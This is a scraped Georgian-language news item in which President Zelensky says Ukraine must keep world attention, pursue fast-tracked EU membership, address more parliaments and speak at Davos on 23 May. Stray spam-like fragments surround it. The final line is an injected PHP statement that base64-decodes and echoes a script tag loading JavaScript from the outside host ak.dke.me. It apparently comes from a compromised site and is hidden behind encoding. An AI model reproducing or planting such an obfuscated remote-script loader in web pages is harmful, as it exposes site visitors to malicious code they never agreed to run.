celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ განაცხადა, რომ უკრაინამ ყველაფერი უნდა გააკეთოს იმისთვის, რომ მსოფლიოს მაქსიმალური ყურადღება შეინარჩუნოს.
 
„კიდევ ერთი ამოცანა, რომელიც მით უფრო მნიშვნელოვანი ხდება, რაც უფრო დიდხანს გაგრძელდება ომი, არის ყველაფერი გავაკეთოთ იმისათვის, რომ შევინარჩუნოთ მსოფლიოს მაქსიმალური ყურადღება ჩვენს, უკრაინის მიმართ. აუცილებლად გავაგრძელებ უკრაინის პარტნიორი ევროპული ქვეყნების პარლამენტებში სიტყვით გამოსვლას. ჩვენი ამოცანაა უკრაინის ევროკავშირის წევრობის კანდიდატის სტატუსის მიღება, შემდეგ კი - ევროკავშირში გაწევრიანება სწრაფი პროცედურით. ყველა სახელმწიფო მნიშვნელოვანია. ყველა ხმა მნიშვნელოვანია. ასეთივე მნიშვნელოვანია ევროპული ქვეყნების მაქსიმალური თანხმობა რუსეთის წინააღმდეგ სანქციების გამკაცრების საკითხში. ამიტომაც მივმართავ ლუქსემბურგის პარლამენტს უახლოეს მომავალში.სხვათა შორის, ჩვენ ასევე ვმუშაობთ ასეთი სპეციალური გამოსვლების გეოგრაფიის გაფართოებაზე აფრიკისა და აზიის პარლამენტებში.
 
23 მაისს იგეგმება დავოსის ფორუმის მონაწილეებისთვის სიტყვით მიმართვა. წელს კონფერენცია განსაკუთრებით მნიშვნელოვანი იქნება ჩვენი ქვეყნისთვის. განიხილება ომის შემდგომი რეკონსტრუქცია. ჩვენ ყველაფერს ვაკეთებთ იმისთვის, რომ სრულად მოვიპოვოთ მსოფლიო მხარდაჭერა და დავოსის ფორუმში მონაწილეობა ამისთვის ერთ-ერთი საუკეთესო შესაძლებლობაა,“- აღნიშნა ზელენსკიმ.
 
637
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");